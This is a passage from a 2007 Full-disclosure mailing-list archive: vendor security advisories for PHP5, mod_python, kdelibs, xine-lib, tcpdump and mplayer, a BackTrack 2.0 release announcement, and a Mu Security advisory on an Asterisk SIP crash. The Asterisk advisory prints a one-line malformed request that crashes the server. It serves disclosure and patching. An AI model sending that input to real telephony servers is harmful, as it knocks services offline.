http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 27778 a5f425db5c6e59f4d414a1d62a2b8fca http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 308518 d6f0ad2bc3957b622957ba8e1fb704ca 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 37282 0932279eda51eb0cd3b4fa937bffc375 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 22822 36ea36d554308267ef49f4c765a755ca http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 10264 84422f0276be805ea2a6c7fc02e3b016 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 25370 735ec4ee74dde0eff2ce307669eb4f1b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 42604 a7cb9c9e3f3313a31b3bd75bfb2d451f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 30462 4e527cc5d0477be79bd8b95a4b8aa00e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 44506 3f3f1313038b7a5fbfdd1ed635e3a2e6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 9816 fe51bc64e327ab05ec923f4a501c7b46 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 16162 4f93cc92b80298270f64b94f6be9421a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 29562 53dc8d3ac6456554f1c9a320950a2abe http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 23794 b388ffeed02462f5e1ca42b49d7740aa http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 41392 92ac4b081a55951f9f1966d07ba6ec65 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_powerpc.deb Size/MD5: 17282 bdd2005caaaef91057d33e0c966a61f2 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 2342178 
a52bd8c74db2a4ccf607655c0475bbc9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 4555930 3ac4db185822c777d63397a6915af796 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 2296724 faa162d38976d97bbcfaacfcf83e98a1 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 139908 c7dbd1cfaa303a6aae59e0d78244b6aa http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 25360 c3f4c24dabbc8156754eb0bd9dfacaf9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 308470 3a4df66c93e41144499b4264a4cd210b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 34100 317e15047bd594f038b567888e6ef99c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 20098 c50f44cb1546a0ab176d23863fdcfd2a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 8456 9295addd932df14f2ac0290446c38322 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 22620 c6a026463a8c8dbd8986f8b2a0cffcb7 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 39186 fbd135194b8aa1ff9e665417c34a5004 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 27312 99e5e96217a08e9992ae76e276515973 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 41220 b82658e62c0e151fe54d11786c3368ae http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 8096 9ef3dee7b074399997d2f1ddec59da72 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.6-1ubuntu2.3_sparc.deb Size/MD5: 14326 6485a83ca14d202c722e14248ad46625 
  http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.6-1ubuntu2.3_sparc.deb
      Size/MD5: 25926 bc25e3db5d98b534c03c0ba99d47a54a
  http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.6-1ubuntu2.3_sparc.deb
      Size/MD5: 21002 12d5f11dc804bc740485a57cfc310a89
  http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.6-1ubuntu2.3_sparc.deb
      Size/MD5: 38446 fb0c0005760518b89192ab3f60204aa2
  http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.6-1ubuntu2.3_sparc.deb
      Size/MD5: 15068 ff61da3d4de17245d8403850f2132aaf

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070307/ca17c7f4/attachment.bin

From Thierry at Zoller.lu Thu Mar 8 12:25:22 2007
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 8 Mar 2007 13:25:22 +0100
Subject: [Full-disclosure] Ann: Backtrack 2.0 released
Message-ID: <817638793.20070308132522@Zoller.lu>

Dear List,

On behalf of the Backtrack Team (which I am _not_ part of) I'd like to direct your attention to the immediate availability of Backtrack 2.0 and would like to personally thank them for the immense effort put into this project.

http://www.remote-exploit.org/backtrack.html

BackTrack is the top-rated Linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-ROM and is fully accessible within minutes. It evolved from the merger of the two widespread distributions Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack gained massive popularity and was voted #1 in the 2006 survey at insecure.org. Security professionals as well as newcomers are using it as their favorite toolset all over the globe.

New exciting features in BackTrack 2, to mention a few:

* Updated kernel: running 2.6.20, with several patches.
* Broadcom-based wireless card support
* Most wireless drivers are built to support raw packet injection
* Metasploit2 and Metasploit3 framework integration
* Alignment to open standards and frameworks like ISSAF and OSSTMM
* Redesigned menu structure to assist the novice as well as the pro
* Japanese input support: reading and writing in Hiragana / Katakana / Kanji.
* A lot more...

BackTrack has a long history and was based on many different Linux distributions; it is now based on a Slackware Linux distribution and the corresponding live-CD scripts. Every package, kernel configuration and script is optimized to be used by security penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

After settling into a stable development procedure during the last releases and consolidating feedback and additions, the team focused on supporting more and newer hardware as well as providing more flexibility and modularity by restructuring the build and maintenance processes. With the current version, most applications are built as individual modules, which helps to speed up maintenance releases and fixes.

Because Metasploit is one of the key tools for most analysts, it is tightly integrated into BackTrack, and both projects collaborate to always provide an on-the-edge implementation of Metasploit within the BackTrack CD-ROM images or the upcoming remote-exploit.org distributed and maintained virtualization images (like VMware image appliances).

Being superior while staying easy to use is key to a good security live CD. We took things a step further and aligned BackTrack to penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.

Currently BackTrack consists of more than 300 different up-to-date tools which are logically structured according to the workflow of security professionals. This structure allows even newcomers to find the tools related to a certain task to be accomplished. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up to date. No other commercial or freely available analysis platform offers an equivalent level of usability with automatic configuration and focus on penetration testing.

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 4813 c403 58f1 1200 7189 a000 7cf1 1200 9f89 a000

From announce-noreply at rpath.com Wed Mar 7 23:00:50 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Wed, 07 Mar 2007 18:00:50 -0500
Subject: [Full-disclosure] rPSA-2007-0051-1 mod_python
Message-ID: <45ef4422.3zNTJkFJSgqx+bRb%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0051-1
Published: 2007-03-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect Deterministic Information Exposure
Updated Versions:
    mod_python=/conary.rpath.com at rpl:devel//1/3.1.4-8.4-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2680
    https://issues.rpath.com/browse/RPL-1105

Description:
    Previous versions of the mod_python package have a weakness that can expose the contents of previously-freed memory, leading to potential information exposure.
From announce-noreply at rpath.com Wed Mar 7 23:01:34 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Wed, 07 Mar 2007 18:01:34 -0500
Subject: [Full-disclosure] rPSA-2007-0052-1 kdelibs
Message-ID: <45ef444e.Lkl4CN6Eew9zBU3o%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0052-1
Published: 2007-03-07
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect Deterministic Weakness
Updated Versions:
    kdelibs=/conary.rpath.com at rpl:devel//1/3.4.2-5.13-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0537
    https://issues.rpath.com/browse/RPL-1117

Description:
    Previous versions of the kdelibs package enable a cross-site scripting (XSS) attack against the Konqueror web browser by embedding certain HTML tags within a comment in a title tag.

From security at mandriva.com Thu Mar 8 15:03:24 2007
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 08 Mar 2007 08:03:24 -0700
Subject: [Full-disclosure] [ MDKSA-2007:057 ] - Updated xine-lib packages to address buffer overflow vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:057
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : xine-lib
 Date    : March 8, 2007
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 The DMO_VideoDecoder_Open function in dmo/DMO_VideoDecoder.c in xine-lib does not set the biSize before use in a memcpy, which allows user-assisted remote attackers to cause a buffer overflow and possibly execute arbitrary code.

 Updated packages have been patched to address this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.0:
 241273125b4e2014a0fa1580c7ed0413  2007.0/i586/libxine1-1.1.2-3.3mdv2007.0.i586.rpm
 e2855220283ec658301068cf00bb266a  2007.0/i586/libxine1-devel-1.1.2-3.3mdv2007.0.i586.rpm
 b98b3376e156fb87a34f30aad34e65e5  2007.0/i586/xine-aa-1.1.2-3.3mdv2007.0.i586.rpm
 88d1b8d538dcff220bf528674d0bf5b0  2007.0/i586/xine-arts-1.1.2-3.3mdv2007.0.i586.rpm
 ce54bd05bd941b2224c549bf685c0a08  2007.0/i586/xine-dxr3-1.1.2-3.3mdv2007.0.i586.rpm
 0e33ea09058a1cd82fd8720278243c14  2007.0/i586/xine-esd-1.1.2-3.3mdv2007.0.i586.rpm
 0e8c92ffdc4c3c8073531a72a47da8ca  2007.0/i586/xine-flac-1.1.2-3.3mdv2007.0.i586.rpm
 3d7eb8f9a5f45ddebd7ccc20cec808f0  2007.0/i586/xine-gnomevfs-1.1.2-3.3mdv2007.0.i586.rpm
 5a1390613c4505b2bfcd326ff0156b0c  2007.0/i586/xine-image-1.1.2-3.3mdv2007.0.i586.rpm
 79899e7608558bb490003b9cba2a978c  2007.0/i586/xine-plugins-1.1.2-3.3mdv2007.0.i586.rpm
 ed4c39cfe82d66caa19c023a8495c4a1  2007.0/i586/xine-sdl-1.1.2-3.3mdv2007.0.i586.rpm
 9256f65fff35cd6c25fd0b19823dcc8a  2007.0/i586/xine-smb-1.1.2-3.3mdv2007.0.i586.rpm
 0bf2ceba6a15a079bf2890265b8f1a55  2007.0/SRPMS/xine-lib-1.1.2-3.3mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 d92a6bebe5c1e915ed6dca150f32de2e  2007.0/x86_64/lib64xine1-1.1.2-3.3mdv2007.0.x86_64.rpm
 eb0c2f9d95f04e3d9c8ea1282c41f5dc  2007.0/x86_64/lib64xine1-devel-1.1.2-3.3mdv2007.0.x86_64.rpm
 cd81757a9c25e480d10932cb4d40f6e0  2007.0/x86_64/xine-aa-1.1.2-3.3mdv2007.0.x86_64.rpm
 acbaf60373d75281d3c3c7da24d7a1de  2007.0/x86_64/xine-arts-1.1.2-3.3mdv2007.0.x86_64.rpm
 38997b2bd174345dcec41682569868c1  2007.0/x86_64/xine-dxr3-1.1.2-3.3mdv2007.0.x86_64.rpm
 2425cc89f26171fc32f889ccf0b5b96c  2007.0/x86_64/xine-esd-1.1.2-3.3mdv2007.0.x86_64.rpm
 5ddcb92e47e6f35de1db5482edf98a9c  2007.0/x86_64/xine-flac-1.1.2-3.3mdv2007.0.x86_64.rpm
 c68e811900a94bd92d65832f64bcdb8a  2007.0/x86_64/xine-gnomevfs-1.1.2-3.3mdv2007.0.x86_64.rpm
 f6aa73615c7c9a7238838641afc6af6a  2007.0/x86_64/xine-image-1.1.2-3.3mdv2007.0.x86_64.rpm
 4437aff317d159abbd1785fbe53368e7  2007.0/x86_64/xine-plugins-1.1.2-3.3mdv2007.0.x86_64.rpm
 4f062b56c298e09b0ec364c18814917f  2007.0/x86_64/xine-sdl-1.1.2-3.3mdv2007.0.x86_64.rpm
 fa2a314dbde0ccedf85043e10d94f3d3  2007.0/x86_64/xine-smb-1.1.2-3.3mdv2007.0.x86_64.rpm
 0bf2ceba6a15a079bf2890265b8f1a55  2007.0/SRPMS/xine-lib-1.1.2-3.3mdv2007.0.src.rpm

 Corporate 3.0:
 dffe302693d57f09ad55573f20400258  corporate/3.0/i586/libxine1-1-0.rc3.6.15.C30mdk.i586.rpm
 76bb6cba723566a5a0a02043d5e02fe2  corporate/3.0/i586/libxine1-devel-1-0.rc3.6.15.C30mdk.i586.rpm
 24645aa6d547c1077236248eb54645f0  corporate/3.0/i586/xine-aa-1-0.rc3.6.15.C30mdk.i586.rpm
 246938c45fe9d795c96aa349bf8cd107  corporate/3.0/i586/xine-arts-1-0.rc3.6.15.C30mdk.i586.rpm
 0af50984ecd9fd2979f3da178871ac1d  corporate/3.0/i586/xine-dxr3-1-0.rc3.6.15.C30mdk.i586.rpm
 80b08a823d7793fb677bbb121a07f9cb  corporate/3.0/i586/xine-esd-1-0.rc3.6.15.C30mdk.i586.rpm
 31c8ad519bfab253300f5d575ea22f5b  corporate/3.0/i586/xine-flac-1-0.rc3.6.15.C30mdk.i586.rpm
 38bcaf1e4bf6f673c0e39048e7701348  corporate/3.0/i586/xine-gnomevfs-1-0.rc3.6.15.C30mdk.i586.rpm
 27627560d6c1c7e5aa2fd63bde435b37  corporate/3.0/i586/xine-plugins-1-0.rc3.6.15.C30mdk.i586.rpm
 3f124f14f5fa8b1e7e3f3917afda3705  corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.15.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 0182ddc1159b46c24589b397412733e1  corporate/3.0/x86_64/lib64xine1-1-0.rc3.6.15.C30mdk.x86_64.rpm
 01cb9805548452a161da99ad385ed474  corporate/3.0/x86_64/lib64xine1-devel-1-0.rc3.6.15.C30mdk.x86_64.rpm
 b121a2b09b0da74ad2553f94319c2771  corporate/3.0/x86_64/xine-aa-1-0.rc3.6.15.C30mdk.x86_64.rpm
 91534b8494ab6ac1eec6c47261f6389b  corporate/3.0/x86_64/xine-arts-1-0.rc3.6.15.C30mdk.x86_64.rpm
 81d95f1a15722144e856384e4fe4a27b  corporate/3.0/x86_64/xine-esd-1-0.rc3.6.15.C30mdk.x86_64.rpm
 f35de55cb2d1b241c60479728ab84ca0  corporate/3.0/x86_64/xine-flac-1-0.rc3.6.15.C30mdk.x86_64.rpm
 b83e2f8b1cbf0802077ee0f7bc1ac6ec  corporate/3.0/x86_64/xine-gnomevfs-1-0.rc3.6.15.C30mdk.x86_64.rpm
 aa6982efb1978493f4d278e5d7ee8787  corporate/3.0/x86_64/xine-plugins-1-0.rc3.6.15.C30mdk.x86_64.rpm
 3f124f14f5fa8b1e7e3f3917afda3705  corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.15.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF7/rEmqjQ0CJFipgRAtZdAJ94tgd8KDteZ2S363e6T0kKNlNV/ACeMI5H
JdD2wOBXCUVX7Vv3c2bdD1Y=
=X6nW
-----END PGP SIGNATURE-----

From noreply at musecurity.com Thu Mar 8 00:09:10 2007
From: noreply at musecurity.com (noreply at musecurity.com)
Date: Thu, 8 Mar 2007 00:09:10 +0000 (GMT)
Subject: [Full-disclosure] [MU-200703-01] Remote DOS in Asterisk SIP
Message-ID: <20070308000912.61A76174@lists.grok.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote DOS in Asterisk SIP [MU-200703-01]
March 07, 2006

http://labs.musecurity.com/advisories.html

Affected Products/Versions:
Asterisk versions 1.2.15 and 1.4.0, and earlier versions

Product Overview:
http://www.asterisk.org/

"Asterisk is the most popular and extensible open source telephone system in the world, offering flexibility, functionality and features not available in advanced, high-end
(high-cost) proprietary business systems. Asterisk is a complete IP PBX (private branch exchange) for businesses, and can be downloaded for free."

Vulnerability Details:
Asterisk crashes when handed an otherwise valid request message but with no URI and no SIP-version in the request-line of the message. For example, "REGISTER\r\n ". The crash is due to a null pointer dereference, and does not appear to be otherwise exploitable.

Vendor Response / Solution:
Fixed in releases 1.2.16 and 1.4.1. Available from http://www.asterisk.org

History:
March 1, 2006 - First contact with vendor
March 2, 2006 - Vendor acknowledges vulnerability
March 7, 2006 - Advisory released

Credit:
This vulnerability was discovered by the Mu Security research team.
http://labs.musecurity.com/pgpkey.txt

Mu Security offers a new class of security analysis system, delivering a rigorous and streamlined methodology for verifying the robustness and security readiness of any IP-based product or application. Founded by the pioneers of intrusion detection and prevention technology, Mu Security is backed by preeminent venture capital firms that include Accel Partners, Benchmark Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA. For more information, visit the company's website at http://www.musecurity.com.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (Darwin)

iD8DBQFF71EEMl+docYeP+YRAukhAJ9UtebKpf+EOAVI1yo7oXq+H46/ggCeMpvp
WtZuYXJRPBo4e0tP04ljrHM=
=I3nE
-----END PGP SIGNATURE-----

From smithj at foresightlinux.org Wed Mar 7 22:06:06 2007
From: smithj at foresightlinux.org (Jonathan Smith)
Date: Wed, 07 Mar 2007 17:06:06 -0500
Subject: [Full-disclosure] FLSA - foresight linux security announcements
Message-ID: <45EF374E.1090207@foresightlinux.org>

Just a heads up to folks that Foresight Linux [1] will now be publishing security advisories. These advisories will be published as soon as updates for the relevant issues have been pushed.

The advisories will be posted to a newly-created mailing list [2] explicitly for this purpose, as well as to FullDisclosure, Bugtraq, and LWN.net. Interested users and developers are encouraged to subscribe to the foresight-security list. Developers who are interested in joining the foresight security team are encouraged to stop by #foresight and say hello.

[1]: http://foresightlinux.org
[2]: http://lists.rpath.org/mailman/listinfo/foresight-security

-smithj

From security at mandriva.com Thu Mar 8 15:20:40 2007
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 08 Mar 2007 08:20:40 -0700
Subject: [Full-disclosure] [ MDKSA-2007:056 ] - Updated tcpdump packages address off-by-one overflow
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:056
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : tcpdump
 Date    : March 8, 2007
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Off-by-one buffer overflow in the parse_elements function in the 802.11 printer code (print-802_11.c) for tcpdump 3.9.5 and earlier allows remote attackers to cause a denial of service (crash) via a crafted 802.11 frame. NOTE: this was originally referred to as heap-based, but it might be stack-based.

 Updated packages have been patched to address this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2006.0:
d92b272b29238545670818ca1d03b171  2006.0/i586/tcpdump-3.9.3-1.3.20060mdk.i586.rpm
66d13291c325f4c08725ee28fd57c21d  2006.0/SRPMS/tcpdump-3.9.3-1.3.20060mdk.src.rpm

Mandriva Linux 2006.0/X86_64:
9a66f32f4fd622c3986a80dd447bad10  2006.0/x86_64/tcpdump-3.9.3-1.3.20060mdk.x86_64.rpm
66d13291c325f4c08725ee28fd57c21d  2006.0/SRPMS/tcpdump-3.9.3-1.3.20060mdk.src.rpm

Mandriva Linux 2007.0:
34629bcb6e9ee83b6e9163bd0e3ab889  2007.0/i586/tcpdump-3.9.4-1.1mdv2007.0.i586.rpm
ba39819805f0935af53e2ec77b302d14  2007.0/SRPMS/tcpdump-3.9.4-1.1mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
e0c4b35447b06600387db895f2ecee54  2007.0/x86_64/tcpdump-3.9.4-1.1mdv2007.0.x86_64.rpm
ba39819805f0935af53e2ec77b302d14  2007.0/SRPMS/tcpdump-3.9.4-1.1mdv2007.0.src.rpm

Corporate 3.0:
f6dc96b67852e9a31868433020500ea1  corporate/3.0/i586/tcpdump-3.8.1-1.3.C30mdk.i586.rpm
978aeb218783686a74e4d2a6e1b772fb  corporate/3.0/SRPMS/tcpdump-3.8.1-1.3.C30mdk.src.rpm

Corporate 3.0/X86_64:
b3440b61b1aaca36fb7426d2108d5a99  corporate/3.0/x86_64/tcpdump-3.8.1-1.3.C30mdk.x86_64.rpm
978aeb218783686a74e4d2a6e1b772fb  corporate/3.0/SRPMS/tcpdump-3.8.1-1.3.C30mdk.src.rpm

Corporate 4.0:
b0d581c7c0166447c32019849638002e  corporate/4.0/i586/tcpdump-3.9.3-1.3.20060mlcs4.i586.rpm
d849293ac434f50fb2159bf0298a9921  corporate/4.0/SRPMS/tcpdump-3.9.3-1.3.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
a0955040cd81b0d5189e2b72fdddf459  corporate/4.0/x86_64/tcpdump-3.9.3-1.3.20060mlcs4.x86_64.rpm
d849293ac434f50fb2159bf0298a9921  corporate/4.0/SRPMS/tcpdump-3.9.3-1.3.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID    Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF7/2XmqjQ0CJFipgRAtBDAKDsiVO4Wq7b5X0/6OmQdodzS42nQwCggOVE
D1MbIAalZVXg12JYfnsmM2k=
=ySaD
-----END PGP SIGNATURE-----

From security at mandriva.com Thu Mar 8 15:30:47 2007
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 08 Mar 2007 08:30:47 -0700
Subject: [Full-disclosure] [ MDKSA-2007:055 ] - Updated mplayer packages to address buffer overflow vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2007:055
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mplayer
Date    : March 8, 2007
Affected: 2007.0, Corporate 3.0
_______________________________________________________________________

Problem Description:

The DMO_VideoDecoder_Open function in loader/dmo/DMO_VideoDecoder.c in MPlayer 1.0rc1 and earlier does not set the biSize before use in a memcpy, which allows user-assisted remote attackers to cause a buffer overflow and possibly execute arbitrary code.

Updated packages have been patched to address this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2007.0:
c79b106f66ef06c04a656adbd2dd5caa  2007.0/i586/libdha1.0-1.0-1.pre8.13.1mdv2007.0.i586.rpm
5a596579a15d7092b559bbbd6c319167  2007.0/i586/mencoder-1.0-1.pre8.13.1mdv2007.0.i586.rpm
dd6293fb4f03bd361932e385d07f8918  2007.0/i586/mplayer-1.0-1.pre8.13.1mdv2007.0.i586.rpm
0b7a8a5af99b3a3975a3f0f9e0b5c70a  2007.0/i586/mplayer-gui-1.0-1.pre8.13.1mdv2007.0.i586.rpm
e90776605fb7d8b2c6c9845431dff696  2007.0/SRPMS/mplayer-1.0-1.pre8.13.1mdv2007.0.src.rpm

Mandriva Linux 2007.0/X86_64:
3ccbf6766332228912f9ca86673ee082  2007.0/x86_64/mencoder-1.0-1.pre8.13.1mdv2007.0.x86_64.rpm
d5544ee7ba584ad39c78221947d9f763  2007.0/x86_64/mplayer-1.0-1.pre8.13.1mdv2007.0.x86_64.rpm
7485610e6dae090636fb34c7c41c9343  2007.0/x86_64/mplayer-gui-1.0-1.pre8.13.1mdv2007.0.x86_64.rpm
e90776605fb7d8b2c6c9845431dff696  2007.0/SRPMS/mplayer-1.0-1.pre8.13.1mdv2007.0.src.rpm

Corporate 3.0:
c856e0fc1743cd8f623d7ee8f9e6ffe3  corporate/3.0/i586/libdha0.1-1.0-0.pre3.14.9.C30mdk.i586.rpm
1350f9e69fd481e17b707a94fb1bc74a  corporate/3.0/i586/libpostproc0-1.0-0.pre3.14.9.C30mdk.i586.rpm
98d7ca9b74490afb20c44efe098761fa  corporate/3.0/i586/libpostproc0-devel-1.0-0.pre3.14.9.C30mdk.i586.rpm
536f8ad600598e2cffce436c1c0e695f  corporate/3.0/i586/mencoder-1.0-0.pre3.14.9.C30mdk.i586.rpm
208ea2e10312f1cba5989ecbf43956f3  corporate/3.0/i586/mplayer-1.0-0.pre3.14.9.C30mdk.i586.rpm
1ff79a1c5e08b898a14010305797893c  corporate/3.0/i586/mplayer-gui-1.0-0.pre3.14.9.C30mdk.i586.rpm
20150c93e21037f29585075932eb7ef0  corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.9.C30mdk.src.rpm

Corporate 3.0/X86_64:
823d5b19da1feead69cb245cbea24ec3  corporate/3.0/x86_64/lib64postproc0-1.0-0.pre3.14.9.C30mdk.x86_64.rpm
b4839689ed4d7fd56198b266a913eda6  corporate/3.0/x86_64/lib64postproc0-devel-1.0-0.pre3.14.9.C30mdk.x86_64.rpm
f522ed8f9e28c712af8820a21635a387  corporate/3.0/x86_64/mencoder-1.0-0.pre3.14.9.C30mdk.x86_64.rpm
91bb9c93d8d71e8978a0dfc9ba5f7b6e  corporate/3.0/x86_64/mplayer-1.0-0.pre3.14.9.C30mdk.x86_64.rpm
10196940030f359d04c345e55c8c98fb  corporate/3.0/x86_64/mplayer-gui-1.0-0.pre3.14.9.C30mdk.x86_64.rpm
20150c93e21037f29585075932eb7ef0  corporate/3.0/SRPMS/mplayer-1.0-0.pre3.14.9.C30mdk.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID    Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF8AEzmqjQ0CJFipgRApNzAJ9RDJuZFdlog1bW7Ol7+vBB1+KFtwCg4ogN
